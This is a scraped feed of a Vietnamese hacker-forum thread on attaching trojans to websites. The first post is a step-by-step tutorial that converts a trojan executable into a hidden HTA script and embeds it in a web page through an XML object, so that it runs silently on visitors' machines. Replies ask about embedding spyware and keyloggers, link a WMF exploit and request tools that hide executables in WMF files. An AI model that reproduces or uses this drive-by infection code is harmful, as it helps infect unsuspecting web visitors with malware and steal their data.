<![CDATA[Latest posts for the topic "Đính trojan vào website-Cool"]]> /hvaonline/posts/list/28.html JForum - http://www.jforum.net Đính trojan vào website-Cool http://mail.packetstormsecurity.org/trojans/exe2vbs.zip Đầu tiên các bạn sử dụng EXE2VBS để convert file trojan của mình ( chẳng hạn tôi sẽ xài 1 con MagicPS ), click vào file trojan kéo vô khung exe của exe2vbs ===> các bạn sẽ được 1 file *.js ! Okie giờ edit lại một chút để thành file hta ( định dạng html thực thi để chạy các activeX ) Chú ý khi chạy exe2vbs trong phần lực chọn có 3 ô các bạn đánh dấu vào 2 mục trên thôi Mở file trojan.exe.js vừa convert ra bằng notepad or wordpad, cho thêm dòng Code:
<script language=vbs>
vào trên cùng Xuống dưới cùng thay dòng: WScript.CreateObject("WScript.Shell").run(pth) bằng Code:
Set Shell1 = CreateObject("WScript.Shell")
Shell1.Run(pth)
</script>
<HTA:APPLICATION WINDOWSTATE='minimize' SHOWINTASKBAR='no' />
</head>
<body onload='window.close()'>
</body>
</html>
Sau đó save lại thành file trojan.hta Sau đó mở file web ra thêm code này vào để run file trojan.hta Code:
<center> 
<span datasrc="#oRun" datafld="view" dataformatas="html"></span> 
<xml id="oRun"> 
<preview> 
<view> 
<![CDATA[ 
<object id="oFile" data="trojan.hta?id=1"></object> 
]]> 
</view> 
</preview> 
</xml> 
</center> 
</body> 
</html>
File htm này sẽ là file để victim truy cập ! Chúc thành công Phương pháp này thực ra không mới ( bạn có thể sử dụng 1 code hta để tự động set homepage, thay đổi cấu hình mặc định của pc, tự động download file về máy tính ... ) tuy nhiên việc tự động run các ActiveX này không còn thực hiện được với XP Sp2 nữa rồi ! ]]> /hvaonline/posts/list/1851.html#9221 /hvaonline/posts/list/1851.html#9221 GMT Đính trojan vào website-Cool /hvaonline/posts/list/1851.html#9637 /hvaonline/posts/list/1851.html#9637 GMT Re: Đính trojan vào website-Cool /hvaonline/posts/list/1851.html#9642 /hvaonline/posts/list/1851.html#9642 GMT Đính trojan vào website-Cool /hvaonline/posts/list/1851.html#9643 /hvaonline/posts/list/1851.html#9643 GMT Đính trojan vào website-Cool

peterhiep wrote:
Vậy ah` Thế anh có cách đính Spy vào Website kô chỉ em với 
pm : tuananhxp.computer@btinternet.com anh giúp cho]]> /hvaonline/posts/list/1851.html#9645 /hvaonline/posts/list/1851.html#9645 GMT Đính trojan vào website-Cool

peterhiep wrote:
Vậy ah` Thế anh có cách đính Spy vào Website kô chỉ em với 
Bạn có thể nhúng trojan vào file *.html nhưng spy, keylogger thì do dung lượng nó lớn dẫn đến việc bạn không thể nhúng nó vào file *.html (Mà mình thấy chỉ có thể dụ victim download về thôi :twisted: )]]> /hvaonline/posts/list/1851.html#10256 /hvaonline/posts/list/1851.html#10256 GMT Đính trojan vào website-Cool /hvaonline/posts/list/1851.html#10265 /hvaonline/posts/list/1851.html#10265 GMT Đính trojan vào website-Cool

peterhiep wrote:
uhm` bạn ah` bạn có biết làm một con victim kô chỉ mình làm với giúp đở mình nha có gí liên hệ với mình qua Gmail:sptink29@gmail.com 
Con "victim" là con gì dzậy, tui mới nghe lần đầu :mrgreen: ]]> /hvaonline/posts/list/1851.html#10272 /hvaonline/posts/list/1851.html#10272 GMT Re: Đính trojan vào website-Cool /hvaonline/posts/list/1851.html#10281 /hvaonline/posts/list/1851.html#10281 GMT Đính trojan vào website-Cool /hvaonline/posts/list/1851.html#10465 /hvaonline/posts/list/1851.html#10465 GMT Đính trojan vào website-Cool /hvaonline/posts/list/1851.html#11003 /hvaonline/posts/list/1851.html#11003 GMT Đính trojan vào website-Cool /hvaonline/posts/list/1851.html#11346 /hvaonline/posts/list/1851.html#11346 GMT Re: Đính trojan vào website-Cool /hvaonline/posts/list/1851.html#12032 /hvaonline/posts/list/1851.html#12032 GMT Đính trojan vào website-Cool /hvaonline/posts/list/1851.html#12054 /hvaonline/posts/list/1851.html#12054 GMT Re: Đính trojan vào website-Cool http://viewhtml.com view code mà nghiên cứu đã chứ]]> /hvaonline/posts/list/1851.html#12404 /hvaonline/posts/list/1851.html#12404 GMT Đính trojan vào website-Cool

Luke wrote:
WMF Exploit http://kehoach45a.com/a 
ông anh này mới đúng là cao thủ võ lâm.ông anh viết nhiều nhiều cho anh em newbie chúng tôi học hỏi thêm.tks a lot.]]> /hvaonline/posts/list/1851.html#12494 /hvaonline/posts/list/1851.html#12494 GMT Đính trojan vào website-Cool

Luke wrote:
WMF Exploit http://kehoach45a.com/a 
Luke có tool (exe) không share cho em cái(jamesmr198@yahoo.com).tôi có mã nguon(vs203) nhưng compile nó báo lỗi hoài(báo lỗi khi biên dịch file winnt.h,winbase.h)]]> /hvaonline/posts/list/1851.html#13268 /hvaonline/posts/list/1851.html#13268 GMT Đính trojan vào website-Cool ') bằng url đến file exe của mình không?]]> /hvaonline/posts/list/1851.html#13293 /hvaonline/posts/list/1851.html#13293 GMT Đính trojan vào website-Cool /hvaonline/posts/list/1851.html#13332 /hvaonline/posts/list/1851.html#13332 GMT Đính trojan vào website-Cool /hvaonline/posts/list/1851.html#13333 /hvaonline/posts/list/1851.html#13333 GMT Đính trojan vào website-Cool /hvaonline/posts/list/1851.html#13393 /hvaonline/posts/list/1851.html#13393 GMT Đính trojan vào website-Cool

mgdaubo wrote:
Ah hiểu sơ sơ rồi, có phải là cái này lợi dụng lỗ hổng của file wmf không? nguyên tắc là đính 1 exe vào 1 file wmf rồi đưa lên web để window tự chạy file wmf đó ,có phải không? Các bạn giải thích dùm đi! 
có 1 tool embed file exe vào file wmf ,nếu ai co share cho AE cái.]]> /hvaonline/posts/list/1851.html#13416 /hvaonline/posts/list/1851.html#13416 GMT Đính trojan vào website-Cool

mgdaubo wrote:
View code rồi mà vẫn chưa hiểu, bây giờ mình muốn nó tự download và chạy 1 file exe của mình thì làm thế nào nhỉ? có phải thay cái src trong: ('') bằng url đến file exe của mình không? 
ko phải, bạn phải tìm tool embed file exe vào wmf.ai có share cho ae cái.]]> /hvaonline/posts/list/1851.html#13419 /hvaonline/posts/list/1851.html#13419 GMT Re: Đính trojan vào website-Cool /hvaonline/posts/list/1851.html#107157 /hvaonline/posts/list/1851.html#107157 GMT Re: Đính trojan vào website-Cool /hvaonline/posts/list/1851.html#107193 /hvaonline/posts/list/1851.html#107193 GMT